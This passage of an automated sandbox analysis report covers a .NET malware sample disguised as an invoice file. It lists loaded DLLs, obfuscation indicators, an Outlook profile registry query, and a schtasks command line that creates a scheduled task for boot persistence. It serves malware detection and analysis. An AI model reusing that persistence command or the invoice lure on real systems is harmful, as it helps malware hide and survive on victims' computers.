Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: TT Invoice copy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TT Invoice copy.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: TT Invoice copy.exe, b4g.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{EZ6(typeof(IntPtr).TypeHandle),EZ6(typeof(Type).TypeHandle)})
Source: pUAQmWA.exe.0.dr, b4g.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{EZ6(typeof(IntPtr).TypeHandle),EZ6(typeof(Type).TypeHandle)})
Source: 0.2.TT Invoice copy.exe.27fa198.3.raw.unpack, SQL.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.cs | .Net Code: Xb7Zq2nSjr System.Reflection.Assembly.Load(byte[])
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.cs | .Net Code: Xb7Zq2nSjr System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 0_2_05266A80 push eax; ret 0_2_05266A81
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_01010CA1 push edi; retf 8_2_01010CAA
Source: C:\Users\user\Desktop\TT Invoice copy.exe | Code function: 8_2_0101CF68 push 040564F4h; iretd 8_2_0101CF75
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 9_2_06876A80 push eax; ret 9_2_06876A81
Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Code function: 13_2_016CCF70 push 0406CAF4h; iretd 13_2_016CCF75
Source: TT Invoice copy.exe | Static PE information: section name: .text entropy: 7.886672511134331
Source: pUAQmWA.exe.0.dr | Static PE information: section name: .text entropy: 7.886672511134331
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, sXgi0htaQsuNYIfNrN.cs | High entropy of concatenated method names: 'e8VcLESMTR', 'bplc7UQDkH', 'siPcJWJ2kY', 'aH2cygJGh8', 'knfc3D8fke', 'KMDcUZTmBW', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, RF748TzdcmDKT0pktw.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPwutp3gBR', 'CACuE4bx9Y', 'vosuwcaWks', 'Xg4u1UHYtd', 'xm5uc5vsrs', 'vSfuuN9BM7', 'eEuuCU8m5C'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, JKqZBeirWwMbFNqmDL.cs | High entropy of concatenated method names: 'SWqvbCjYWW', 'sj3vMt5Te0', 'Q3QvQvCNCN', 'FJrvlc09i3', 'U9AvDY10lv', 'iFEQPonF8S', 'Q34QkPrmCa', 'HVbQWKcx8U', 'hlbQ89vhvp', 'lWjQSkRCoa'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, IGQN0nJpmP2x7MnecC.cs | High entropy of concatenated method names: 'UHytm12oUH', 'lditYNhn58', 'FUMtLBKhXg', 'FVet7GNBKO', 'wQ3tykcfWX', 'KRwtUmNqnA', 'xWjtaUby3e', 'L3Xtnaa0ic', 'NTutotpp4t', 'gEht5LhIyO'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, T6oa9E5pSUGTToS4lh.cs | High entropy of concatenated method names: 'GEETruTbk4', 'SJgTXI8XXZ', 'HHSTm0QY9d', 'MFBTYHe2Zw', 'j6rTEuH8Ag', 'roLTw0fuNC', 'D3sT1tqGEC', 'qVZTc81uP4', 'qmATusJkV0', 'bMtTCMiNMs'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, W27nI3oWEWom4ACrBM.cs | High entropy of concatenated method names: 'Odp18m1xc3', 'ViZ1hucEXj', 'pH9cOBTpkf', 'dVRcHekvaB', 'S1k15holsM', 'bAE1gBs6Qh', 'GQC1AIub7E', 'H6V13DRVYv', 'HBS1Ba3t1S', 'Wwo1imgbqO'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, TtJm5uphC0oEuZAqoE.cs | High entropy of concatenated method names: 'pRLxbuCn6F', 'UGexslVkpn', 'gTtxMZslpS', 'cu5xTTNyWf', 'bZPxQbwgke', 'YN5xv8YBVC', 'XuPxlRXNmb', 'aKWxDKOvAJ', 'yoYxdwUUjy', 'XYlxekKR1q'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, lJcE0HN5f8kFk2IH54.cs | High entropy of concatenated method names: 'Dispose', 'TW9HSXAt0E', 'L0N27JFKWl', 'knlffqgW1p', 'HxYHh31VCA', 'b8UHz9fQOM', 'ProcessDialogKey', 'pbq2OVIB7w', 'ag52HQgLgj', 'm9522UefFy'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, qLRTZ12GJnmImXqtRt.cs | High entropy of concatenated method names: 'gGNqqDmb5', 'Cu4rRM8Yk', 'aQNXZCrpD', 'zShpeKohQ', 'vNgYoLuqT', 'rq1GLXrfM', 'NkNiFAo1j03I4l2Hqt', 'OUxwLDv0xEo9vI7S35', 'SK6cwJ0Mx', 'QJBCihhpO'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, zy1XZnLW7YQBNumutP.cs | High entropy of concatenated method names: 'wxBQVktK8I', 'C2bQpCqX80', 'fIxTJ0OXD3', 'sZETyaGlLf', 'k0mTUBOgof', 'TWhTRi4aCh', 'PVpTan5CcX', 'xcMTnl43b7', 'cFNTInxkqM', 'd76TodruR1'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, thBvlWSkjabsB2oLif.cs | High entropy of concatenated method names: 'beUls46f10', 'xKOlTRJ4iv', 'ftTlvmDDie', 'WBfvha3ryP', 'eDOvzHaE1w', 'PYUlO9LtIC', 'SMIlHysCNl', 'yiBl2EZCpI', 'pPulxOFZih', 'VWglZw5oRB'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, XFsF25IxPNfEBmhSd8o.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g7MC30g4VA', 'NFMCBCWjmc', 'oNnCiEbGZY', 'kTtC9a6ne7', 'qF0CP9xwAw', 'yfgCkEVOYj', 'gdnCW89DHu'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, xfd7J5uMrysOyK7NTk.cs | High entropy of concatenated method names: 'Gg5csn5vOU', 'NdvcMOGdGD', 'wIPcTZ9vAw', 'Sa9cQgZ6BF', 'exMcvL9XPL', 'F59clikeCE', 'Y4dcDvyhlN', 'tWNcdjyIix', 'lSkce39KRw', 'a5Sc6Lr819'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, rRuIvBqw2lDAV0Lgfa.cs | High entropy of concatenated method names: 'G9UHlpnj35', 'HHEHDGpdJV', 'V2OHeHynYk', 'XnjH6l3OqT', 'WplHE3HTY4', 'Ld8HwbDhxY', 'PvAPtSeJvsMMgFlVtb', 'qy0n47VISNXu0UHG6E', 'je7HHelc7G', 'aBDHxDaWlk'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, eZUFRljWcJZhOkQ3W5.cs | High entropy of concatenated method names: 'uy5aAUrfbD6AS4VmPn4', 'ykP6lgrX7bo9HR9gqTS', 'fo4vceFy0s', 'cDKvuHZAma', 't9UvCUZLID', 'rOid46rBORdQJUjnS7h', 'Y3BdSrrEZ2NbW7WvYAC', 'iuyNJFruwbl5e27AE1M'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, FSSV4QIOZXRnmau7TRE.cs | High entropy of concatenated method names: 'MZSu4sANgj', 'VHduKuKe29', 'mG1uqpuT4M', 'dTBur5CDr0', 'oEQuVq4ljP', 'qm8uXugPXJ', 'nIXup4gCnW', 'rHZumd70KX', 'CO8uYTAOpw', 'TmuuGJ2kJw'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, rGsUy5rWUNpkLEljaY.cs | High entropy of concatenated method names: 'zTduHwiesW', 'TxpuxmFfAK', 'MnVuZsrqYq', 'vSGusLD2CR', 'paxuMrL2xu', 'K0JuQdoqbI', 'gccuvsfIMF', 'vjDcWkw4Wg', 'UKFc8DFkdj', 'pSmcSms6j4'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, Fe6Q71Wm6WhO9Yp10w.cs | High entropy of concatenated method names: 'zenM3C7DZm', 'JHCMBWjbKO', 'SI3Mij3Mlg', 'yr8M9OwsqB', 'nVlMPaDK9J', 'QffMkNPX2G', 'u9AMWA71PB', 'Qn3M8cR107', 'GCdMSEVZix', 'Dk4MhRjTCD'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, m0qy82dasqNwHe64S4.cs | High entropy of concatenated method names: 'DD7l4ASIr1', 'DoylKnkDZI', 'NQhlqqO6iQ', 'ye5lrAm3Ja', 'WrdlVKKKTs', 'YJvlX0fJy6', 'o85lpq2QI8', 'RnZlmll86F', 'eUhlYcnCDY', 'ivtlG4CMZ1'
Source: 0.2.TT Invoice copy.exe.3b39ff0.9.raw.unpack, QlYnWW9i1E3P9XLykS.cs | High entropy of concatenated method names: 'ToString', 'eNLw591lQM', 'CPgw7OOxO6', 'J8NwJWC9Kq', 'Rpqwy3Jkjj', 'EKxwUgDp3w', 'NO4wRu7yST', 'ImfwaiyARs', 'iuQwn31Dv1', 'I4RwIGbQnt'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, sXgi0htaQsuNYIfNrN.cs | High entropy of concatenated method names: 'e8VcLESMTR', 'bplc7UQDkH', 'siPcJWJ2kY', 'aH2cygJGh8', 'knfc3D8fke', 'KMDcUZTmBW', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, RF748TzdcmDKT0pktw.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nPwutp3gBR', 'CACuE4bx9Y', 'vosuwcaWks', 'Xg4u1UHYtd', 'xm5uc5vsrs', 'vSfuuN9BM7', 'eEuuCU8m5C'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, JKqZBeirWwMbFNqmDL.cs | High entropy of concatenated method names: 'SWqvbCjYWW', 'sj3vMt5Te0', 'Q3QvQvCNCN', 'FJrvlc09i3', 'U9AvDY10lv', 'iFEQPonF8S', 'Q34QkPrmCa', 'HVbQWKcx8U', 'hlbQ89vhvp', 'lWjQSkRCoa'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, IGQN0nJpmP2x7MnecC.cs | High entropy of concatenated method names: 'UHytm12oUH', 'lditYNhn58', 'FUMtLBKhXg', 'FVet7GNBKO', 'wQ3tykcfWX', 'KRwtUmNqnA', 'xWjtaUby3e', 'L3Xtnaa0ic', 'NTutotpp4t', 'gEht5LhIyO'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, T6oa9E5pSUGTToS4lh.cs | High entropy of concatenated method names: 'GEETruTbk4', 'SJgTXI8XXZ', 'HHSTm0QY9d', 'MFBTYHe2Zw', 'j6rTEuH8Ag', 'roLTw0fuNC', 'D3sT1tqGEC', 'qVZTc81uP4', 'qmATusJkV0', 'bMtTCMiNMs'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, W27nI3oWEWom4ACrBM.cs | High entropy of concatenated method names: 'Odp18m1xc3', 'ViZ1hucEXj', 'pH9cOBTpkf', 'dVRcHekvaB', 'S1k15holsM', 'bAE1gBs6Qh', 'GQC1AIub7E', 'H6V13DRVYv', 'HBS1Ba3t1S', 'Wwo1imgbqO'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, TtJm5uphC0oEuZAqoE.cs | High entropy of concatenated method names: 'pRLxbuCn6F', 'UGexslVkpn', 'gTtxMZslpS', 'cu5xTTNyWf', 'bZPxQbwgke', 'YN5xv8YBVC', 'XuPxlRXNmb', 'aKWxDKOvAJ', 'yoYxdwUUjy', 'XYlxekKR1q'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, lJcE0HN5f8kFk2IH54.cs | High entropy of concatenated method names: 'Dispose', 'TW9HSXAt0E', 'L0N27JFKWl', 'knlffqgW1p', 'HxYHh31VCA', 'b8UHz9fQOM', 'ProcessDialogKey', 'pbq2OVIB7w', 'ag52HQgLgj', 'm9522UefFy'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, qLRTZ12GJnmImXqtRt.cs | High entropy of concatenated method names: 'gGNqqDmb5', 'Cu4rRM8Yk', 'aQNXZCrpD', 'zShpeKohQ', 'vNgYoLuqT', 'rq1GLXrfM', 'NkNiFAo1j03I4l2Hqt', 'OUxwLDv0xEo9vI7S35', 'SK6cwJ0Mx', 'QJBCihhpO'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, zy1XZnLW7YQBNumutP.cs | High entropy of concatenated method names: 'wxBQVktK8I', 'C2bQpCqX80', 'fIxTJ0OXD3', 'sZETyaGlLf', 'k0mTUBOgof', 'TWhTRi4aCh', 'PVpTan5CcX', 'xcMTnl43b7', 'cFNTInxkqM', 'd76TodruR1'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, thBvlWSkjabsB2oLif.cs | High entropy of concatenated method names: 'beUls46f10', 'xKOlTRJ4iv', 'ftTlvmDDie', 'WBfvha3ryP', 'eDOvzHaE1w', 'PYUlO9LtIC', 'SMIlHysCNl', 'yiBl2EZCpI', 'pPulxOFZih', 'VWglZw5oRB'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, XFsF25IxPNfEBmhSd8o.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g7MC30g4VA', 'NFMCBCWjmc', 'oNnCiEbGZY', 'kTtC9a6ne7', 'qF0CP9xwAw', 'yfgCkEVOYj', 'gdnCW89DHu'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, xfd7J5uMrysOyK7NTk.cs | High entropy of concatenated method names: 'Gg5csn5vOU', 'NdvcMOGdGD', 'wIPcTZ9vAw', 'Sa9cQgZ6BF', 'exMcvL9XPL', 'F59clikeCE', 'Y4dcDvyhlN', 'tWNcdjyIix', 'lSkce39KRw', 'a5Sc6Lr819'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, rRuIvBqw2lDAV0Lgfa.cs | High entropy of concatenated method names: 'G9UHlpnj35', 'HHEHDGpdJV', 'V2OHeHynYk', 'XnjH6l3OqT', 'WplHE3HTY4', 'Ld8HwbDhxY', 'PvAPtSeJvsMMgFlVtb', 'qy0n47VISNXu0UHG6E', 'je7HHelc7G', 'aBDHxDaWlk'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, eZUFRljWcJZhOkQ3W5.cs | High entropy of concatenated method names: 'uy5aAUrfbD6AS4VmPn4', 'ykP6lgrX7bo9HR9gqTS', 'fo4vceFy0s', 'cDKvuHZAma', 't9UvCUZLID', 'rOid46rBORdQJUjnS7h', 'Y3BdSrrEZ2NbW7WvYAC', 'iuyNJFruwbl5e27AE1M'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, FSSV4QIOZXRnmau7TRE.cs | High entropy of concatenated method names: 'MZSu4sANgj', 'VHduKuKe29', 'mG1uqpuT4M', 'dTBur5CDr0', 'oEQuVq4ljP', 'qm8uXugPXJ', 'nIXup4gCnW', 'rHZumd70KX', 'CO8uYTAOpw', 'TmuuGJ2kJw'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, rGsUy5rWUNpkLEljaY.cs | High entropy of concatenated method names: 'zTduHwiesW', 'TxpuxmFfAK', 'MnVuZsrqYq', 'vSGusLD2CR', 'paxuMrL2xu', 'K0JuQdoqbI', 'gccuvsfIMF', 'vjDcWkw4Wg', 'UKFc8DFkdj', 'pSmcSms6j4'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, Fe6Q71Wm6WhO9Yp10w.cs | High entropy of concatenated method names: 'zenM3C7DZm', 'JHCMBWjbKO', 'SI3Mij3Mlg', 'yr8M9OwsqB', 'nVlMPaDK9J', 'QffMkNPX2G', 'u9AMWA71PB', 'Qn3M8cR107', 'GCdMSEVZix', 'Dk4MhRjTCD'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, m0qy82dasqNwHe64S4.cs | High entropy of concatenated method names: 'DD7l4ASIr1', 'DoylKnkDZI', 'NQhlqqO6iQ', 'ye5lrAm3Ja', 'WrdlVKKKTs', 'YJvlX0fJy6', 'o85lpq2QI8', 'RnZlmll86F', 'eUhlYcnCDY', 'ivtlG4CMZ1'
Source: 0.2.TT Invoice copy.exe.6fb0000.15.raw.unpack, QlYnWW9i1E3P9XLykS.cs | High entropy of concatenated method names: 'ToString', 'eNLw591lQM', 'CPgw7OOxO6', 'J8NwJWC9Kq', 'Rpqwy3Jkjj', 'EKxwUgDp3w', 'NO4wRu7yST', 'ImfwaiyARs', 'iuQwn31Dv1', 'I4RwIGbQnt'
Source: C:\Users\user\Desktop\TT Invoice copy.exe | File created: C:\Users\user\AppData\Roaming\pUAQmWA.exe

Boot Survival

Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Desktop\TT Invoice copy.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
